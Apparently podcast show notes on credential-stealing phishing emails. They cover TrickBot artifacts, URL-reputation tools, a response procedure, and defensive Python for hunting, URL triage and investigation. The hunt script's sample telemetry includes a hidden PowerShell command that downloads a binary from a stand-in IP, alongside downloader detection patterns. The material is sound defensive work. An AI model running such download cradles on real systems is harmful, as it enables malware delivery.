TOPIC: CREDENTIAL STEALING EMAILS WHAT CAN YOU DO
OUR GUEST WILL BE:
Martin Brough - Manager of the Security Solutions Engineering team in the email phishing industry
Topic of the day will be:
"Credential Stealing emails what can YOU do"
Show Notes:
Introductions
Introduce our Guest
Martin Brough
Twitter - @HackerNinja
Blog - InfoSec512.com
News-worthy:
1. The Register: Perv raided college girls' online accounts for nude snaps – by cracking their security questions. Personal info obtained to pull off 1,400 password resets. Now he's behind bars.
Powell's interest in all this was obtaining private sexually explicit photos, which people apparently store in their email accounts without much thought about security. It's not immediately clear why the large number of such images on the internet did not suffice.
Jonathan C. Powell, who hacked into over 1,000 email accounts in search of sexually explicit images and videos of college-aged women, was jailed for six months for computer fraud, the US Department of Justice said on Thursday.
"During that time frame, those Reset Utility accesses resulted in approximately 18,600 attempted password changes in connection with approximately 2,054 unique [Pace] email accounts, and approximately 1,378 successful password changes in connection with approximately 1,035 unique [Pace] email accounts," explained FBI special agent Christopher Merriman in the complaint.
2. The Hacker News: Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems
The article states that "As CrossRAT is written in Java, it requires Java to be installed." Not entirely true: the dropper can check for Java and, if none is present, download a JRE and run it locally, or install the "jPortable Launcher".
Also, it is interesting that the article calls it undetectable in the title, but then tells you how to detect it by looking for a run key.
3. Windows 10 Creators Update breaks purposely set security tweaks
4. TrickBot
Artifacts:
Delivered by a Word doc with macros
Uses cscript and PowerShell to grab the dropper
PowerShell gets the dropper and also launches one of the batch files to load it
Stores files in %APPDATA%, i.e. AppData\Roaming\localservice, containing:
Some oddly named binary
A Client_ID file
A Group_tag file
A directory named Modules
You can see a couple of batch files in %TEMP%, and the binary there before it is copied into place
Persistence is a scheduled task called "services update"
Named pipe connection for PowerShell
The IP it used was at a US-based hosting service
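The artifacts above translate directly into hunt logic. The Python below is an added example (not code from the podcast, and not LOG-MD) that runs the checks over exported endpoint telemetry: Office spawning a script host, a PowerShell downloader, the Client_ID/Group_tag/Modules markers under AppData\Roaming\localservice, batch files in %TEMP%, and the "services update" task. The event records are constructed, simplified Sysmon-style dicts; the field names are an assumed schema, and the user name, file names and 203.0.113.10 are made up for the example.

```python
"""Hunt for the TrickBot artifacts listed above in exported endpoint telemetry.

Added example, not from the podcast and not LOG-MD code. The events are
constructed, simplified Sysmon-style records (process create, file create,
scheduled task); the field names are an assumed schema, and the file names,
user name and 203.0.113.10 are made up for the example.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe"}
# %APPDATA% is ...\AppData\Roaming, so the staging dir is AppData\Roaming\localservice
LOCALSERVICE_RE = re.compile(r"\\AppData\\Roaming\\localservice\\", re.I)
TEMP_BATCH_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.bat$", re.I)
DOWNLOADER_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I)
STAGING_MARKERS = {"client_id", "group_tag", "modules"}
PERSISTENCE_TASK = "services update"

SAMPLE_EVENTS = [  # constructed sample telemetry, not a real capture
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Users\alice\AppData\Local\Temp\d1.vbs"},
    {"type": "process", "parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://203.0.113.10/x.bin', $env:TEMP + '\\bqsd.exe')\""},
    {"type": "file", "path": r"C:\Users\alice\AppData\Local\Temp\bqsd.exe"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Local\Temp\launch.bat"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\localservice\bqsd.exe"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\localservice\client_id"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\localservice\group_tag"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\localservice\Modules\systeminfo32"},
    {"type": "task", "name": "services update",
     "action": r"C:\Users\alice\AppData\Roaming\localservice\bqsd.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def basename(path):
    """Lower-cased final path component; tolerates Windows separators on any OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events):
    """Return (rule, detail) pairs for every event that matches a TrickBot artifact."""
    findings = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host", f"{parent} -> {image}"))
            if image == "powershell.exe" and DOWNLOADER_RE.search(cmd):
                findings.append(("powershell_downloader", cmd))
        elif kind == "file":
            path = ev["path"]
            m = LOCALSERVICE_RE.search(path)
            if m:
                # first path component below localservice: a marker file/dir or the binary
                first = path[m.end():].split("\\", 1)[0].lower()
                if first in STAGING_MARKERS:
                    findings.append(("trickbot_staging_marker", first))
                elif first.endswith(".exe"):
                    findings.append(("binary_in_localservice", path))
            elif TEMP_BATCH_RE.search(path):
                findings.append(("batch_in_temp", path))
        elif kind == "task" and ev["name"].strip().lower() == PERSISTENCE_TASK:
            findings.append(("persistence_task", ev["action"]))
    return findings


if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

The Office-to-script-host and PowerShell-downloader rules will fire on other macro malware too; the localservice markers and the "services update" task are what make the match TrickBot-specific, so treat the first two as a trigger to go look for the others.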
Site-worthy:
BDIR Pick
MalPedia - reports and info on malware families and their actors and yara signatures
https://malpedia.caad.fkie.fraunhofer.de/families
Malware Arch - Malware Reports
Martin - https://cymon.io/
Martin - https://domainIQ.com
Tools-worthy:
BDIR Picks
Put the full URL into it so it can read the bad page
Good screenshot
Use the "Tools" option to get more data about the site, including ASNs
WhoIs, ASNs, created date, country, IP
Screenshot
Country, IP, ASN
Short blacklist list
I prefer this one because it is US-based.
https://fortiguard.com/webfilter
Generally has the most current blacklist status (their own)
Also gives country
Safety Reputation
Domain age
https://talosintelligence.com/
Reputation details, web category
Country with map
Martin’s Picks
LOG-MD - www.LOG-MD.com
Sherlock
Topic of the DAY
Credential Stealing emails what can YOU do….
What to look for if you DON'T have a lab (and also in your lab):
Screenshots – An authentication page on a domain that is not yours is a good indicator of a credential-stealing site
Domain age - How old is the domain, in days or years? Is it new? Does the name look like the output of a DGA (Domain Generation Algorithm)?
Blacklists – Is the domain on any blacklists? If so, why is the SMTP gateway not catching it?
Category – Has the site been categorized (Blog/Malware/etc.)?
Reputation – Is this a Bad, Neutral or Good site?
Country – Where is this URL hosted?
Alexa rank - How well known is it?
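To show how these signals combine, here is an added Python example (not from the podcast) that scores a suspect URL from the signals above. The real lookups (WHOIS creation date, FortiGuard/Talos category and reputation, blacklist hits, Alexa rank, the screenshot) need network access, so they are passed in as a constructed dict of what you would copy off those sites; the point weights, the DGA thresholds, and the hostnames are assumptions for illustration. It goes one step beyond the list by adding a cheap "does this label look machine-generated" check, which is the DGA question made testable.

```python
"""Score the credential-phish signals above for a suspect URL, offline.

Added example, not from the podcast. Lookup results are a constructed dict;
weights and DGA thresholds are assumptions, and the hostnames are made up.
"""
import math
import re
from datetime import date
from urllib.parse import urlsplit

VOWELS = set("aeiou")
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
BAD_CATEGORIES = {"malware", "phishing", "malicious websites", "spam urls"}


def host_of(url):
    """Lower-cased hostname of the URL, or None if it cannot be parsed."""
    host = urlsplit(url).hostname
    return host.lower() if host else None


def second_level_label(host):
    """Label left of the TLD; naive split that assumes a one-label suffix."""
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s):
    """Bits of entropy per character in s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def looks_dga(label):
    """Cheap DGA heuristic: a long, high-entropy label with few vowels, or one
    that is mostly digits. Thresholds are assumptions, not a vendor's."""
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    digit_ratio = sum(c.isdigit() for c in label) / len(label) if label else 0.0
    high_entropy = len(label) >= 10 and shannon_entropy(label) > 3.0 and vowel_ratio < 0.2
    return high_entropy or digit_ratio > 0.3


def triage(url, lookups, today, home_countries=("US",)):
    """Combine the show's signals into (score, reasons). lookups keys, all
    optional: created (date), blacklists (list), category (str), reputation
    ('bad'|'neutral'|'good'), country (str), alexa_rank (int), login_page (bool)."""
    host = host_of(url)
    if host is None:
        return 0, ["URL could not be parsed"]
    score, reasons = 0, []

    def hit(points, why):
        nonlocal score
        score += points
        reasons.append(why)

    if IPV4_RE.fullmatch(host):
        hit(2, "raw IP address instead of a domain name")
    elif looks_dga(second_level_label(host)):
        hit(3, "domain label looks algorithmically generated (DGA)")
    created = lookups.get("created")
    if created is None:
        hit(1, "no creation date available (unknown or privacy-protected WHOIS)")
    elif (today - created).days < 30:
        hit(3, f"domain registered only {(today - created).days} days ago")
    elif (today - created).days < 365:
        hit(1, "domain is less than a year old")
    if lookups.get("blacklists"):
        hit(3, "blacklisted by " + ", ".join(lookups["blacklists"]) + "; ask why the SMTP gateway let it through")
    category = lookups.get("category")
    if category is None:
        hit(1, "site has not been categorized")
    elif category.lower() in BAD_CATEGORIES:
        hit(3, f"categorized as {category}")
    if lookups.get("reputation") == "bad":
        hit(3, "bad reputation")
    elif lookups.get("reputation") != "good":
        hit(1, "neutral or unknown reputation")
    country = lookups.get("country")
    if country not in home_countries:
        hit(1, f"hosted in {country or 'an unknown country'}")
    rank = lookups.get("alexa_rank")
    if rank is None or rank > 1_000_000:
        hit(1, "not a well-known site (no or very low Alexa rank)")
    if lookups.get("login_page"):
        hit(2, "screenshot shows an authentication page")
    return score, reasons


def verdict(score):
    return "likely credential phish" if score >= 8 else "suspicious" if score >= 4 else "low concern"


# Constructed lookup results, as if copied from the URL-evaluation sites.
TODAY = date(2018, 2, 1)
SUSPECT_URL = "http://webmail-verify-secure.example/owa/auth/logon.aspx"
SUSPECT_LOOKUPS = {"created": date(2018, 1, 20), "blacklists": ["FortiGuard"], "category": None,
                   "reputation": "bad", "country": "RU", "alexa_rank": None, "login_page": True}
KNOWN_GOOD_URL = "https://www.google.com/accounts/login"
KNOWN_GOOD_LOOKUPS = {"created": date(1997, 9, 15), "blacklists": [], "category": "Search Engines",
                      "reputation": "good", "country": "US", "alexa_rank": 1, "login_page": True}

if __name__ == "__main__":
    for url, lookups in ((SUSPECT_URL, SUSPECT_LOOKUPS), (KNOWN_GOOD_URL, KNOWN_GOOD_LOOKUPS)):
        score, reasons = triage(url, lookups, TODAY)
        print(f"{url}: score {score} -> {verdict(score)}")
        for why in reasons:
            print("  -", why)
```

The reasons list is what goes into the report: "12 days old, blacklisted by one vendor, uncategorized, bad reputation, login page" is a far more useful line than a bare score. Note that a login page alone scores low on purpose; a real login page on your own domain is the normal case, and it is the combination with age and reputation that matters.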
Evaluating it in a Lab
LOG-MD Babbeeeee
Steps to take when you get a Phishing email
1. Of course, you get an alert of some kind or are notified
2. Get a copy of the email - You can't evaluate it if you don't have an actual copy; your help desk's copy might not have the context (headers, links) intact
3. Evaluate the URL
In a lab, click all the way through and log in too (with fake creds)
Or use one of the URL evaluation sites
4. Block the URL - You need a web proxy for that, of course
Or block the IP in the firewall
5. Monitor the IPs in log management using your firewall logs
Who else went there?
You will have a HUGE gap for offsite/roaming people
6. Consider fast, mass disabling of the affected accounts
7. Recall the message from your mail servers
Keep people from opening it
8. Monitor any Internet-facing non-2-factor email logins
Unless you reset all the users who received the phish
9. Monitor any Internet-facing non-2-factor VPN logins
Unless you reset all the users who received the phish
10. Monitor any Internet-facing non-2-factor cloud storage logins
11. Monitor any Internet-facing non-2-factor virtual desktop logins
12. Monitor for password resets to make sure you got everybody
13. Contact the sender to let them know they have been owned
Assuming you can confirm it actually came from them (check the SMTP logs)
14. Create a report
What happened, and how did it come in?
What improvements can be made to avoid it?
Improvements to monitoring or hunting
15. Update your email investigation process
You will improve each time
Someone will need to do this when YOU are not at work or are asleep
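Steps 2, 3, 5, 8 and 12 above, worked end to end in Python as an added example (not from the podcast): parse the actual copy of the email to get the URL, the recipients and the send time; defang the URL for the report; find who else went to that host in the proxy logs; then list the recipients who have since logged in to Internet-facing non-2-factor webmail from an IP never seen for them before the phish and have not had a password reset. The .eml, the proxy log and the auth log are constructed inline; the log layouts (a squid-style native proxy line and a simple CSV auth log), and every host, user and IP are assumptions, not a vendor format or real data.

```python
"""Steps 2, 3, 5, 8 and 12 of the phishing procedure, on constructed data.

Added example, not from the podcast. The .eml, proxy log and auth log are
constructed; their layouts and every host, user and IP are assumptions.
"""
import re
from datetime import datetime
from email import message_from_string, policy
from urllib.parse import urlsplit

PHISH_EML = """\
From: "IT Helpdesk" <helpdesk@partner-org.example>
To: alice@corp.example, bob@corp.example
Subject: Mailbox quota exceeded
Date: Thu, 01 Feb 2018 09:02:00 +0000
Content-Type: text/html; charset="utf-8"

<html><body>Your mailbox is full.
<a href="http://webmail-verify-secure.example/owa/auth/logon.aspx?u=alice">Verify now</a>
</body></html>
"""

# Squid-style native log (assumed): time elapsed client code/status bytes method url user hierarchy type
PROXY_LOG = """\
1517479200.101 312 10.1.2.3 TCP_MISS/200 4210 GET http://webmail-verify-secure.example/owa/auth/logon.aspx?u=alice alice DIRECT/203.0.113.10 text/html
1517479260.552 120 10.1.2.9 TCP_MISS/200 4210 GET http://webmail-verify-secure.example/owa/auth/logon.aspx carol DIRECT/203.0.113.10 text/html
1517479300.004 80 10.1.2.4 TCP_MISS/200 900 GET http://www.example.com/ bob DIRECT/192.0.2.1 text/html
"""

# Internet-facing webmail/VPN logins (assumed CSV): timestamp,user,src_ip,service,mfa,result
AUTH_LOG = """\
timestamp,user,src_ip,service,mfa,result
2018-01-30T08:00:00Z,alice,198.51.100.7,OWA,no,success
2018-02-01T10:15:00Z,alice,203.0.113.55,OWA,no,success
2018-02-01T10:18:00Z,alice,203.0.113.55,VPN,yes,success
2018-02-01T10:20:00Z,bob,198.51.100.9,OWA,no,success
2018-02-01T10:30:00Z,carol,203.0.113.55,OWA,no,success
"""

# Password resets already done (step 12), user -> time
RESETS = {"bob": "2018-02-01T11:00:00Z"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def parse_phish(raw_eml):
    """Steps 2/3: URLs, recipients (local parts) and send time from the real copy."""
    msg = message_from_string(raw_eml, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    return {
        "urls": sorted(set(URL_RE.findall(body))),
        "recipients": [a.addr_spec.split("@")[0] for a in msg["To"].addresses],
        "sent": msg["Date"].datetime,
    }


def defang(url):
    """Make the URL safe to paste into the report (step 14)."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def other_visitors(urls, proxy_log):
    """Step 5: who else went to the phishing host(s); user -> client IPs."""
    hosts = {urlsplit(u).hostname for u in urls}
    hits = {}
    for line in proxy_log.splitlines():
        fields = line.split()
        if len(fields) >= 8 and urlsplit(fields[6]).hostname in hosts:
            hits.setdefault(fields[7], set()).add(fields[2])
    return hits


def needs_reset(recipients, sent, auth_log, resets):
    """Steps 8 and 12: recipients with a successful non-MFA login after the phish
    from an IP never seen for them before it, and no password reset since."""
    ts = lambda s: datetime.fromisoformat(s.replace("Z", "+00:00"))
    baseline, latest_bad = {}, {}
    for row in auth_log.splitlines()[1:]:
        when_s, user, ip, _service, mfa, result = row.split(",")
        if user not in recipients or result != "success":
            continue
        when = ts(when_s)
        if when < sent:
            baseline.setdefault(user, set()).add(ip)  # IPs this user used before the phish
        elif mfa == "no" and ip not in baseline.get(user, set()):
            latest_bad[user] = max(latest_bad.get(user, when), when)
    return sorted(u for u, when in latest_bad.items() if u not in resets or ts(resets[u]) < when)


def investigate(raw_eml, proxy_log, auth_log, resets):
    """Tie the steps together into the material for the report (step 14)."""
    info = parse_phish(raw_eml)
    return {
        "iocs": [defang(u) for u in info["urls"]],
        "recipients": info["recipients"],
        "other_visitors": other_visitors(info["urls"], proxy_log),
        "still_need_reset": needs_reset(info["recipients"], info["sent"], auth_log, resets),
    }


if __name__ == "__main__":
    for key, value in investigate(PHISH_EML, PROXY_LOG, AUTH_LOG, RESETS).items():
        print(f"{key}: {value}")
```

Two things the output makes visible that the list alone does not: carol never received the phish but still visited the page (a forward, or a second wave), which is why step 5 goes to the proxy logs rather than the recipient list; and bob drops off the reset list only because his reset came after his suspicious login, so the reset timestamp, not just the fact of a reset, is what step 12 has to check.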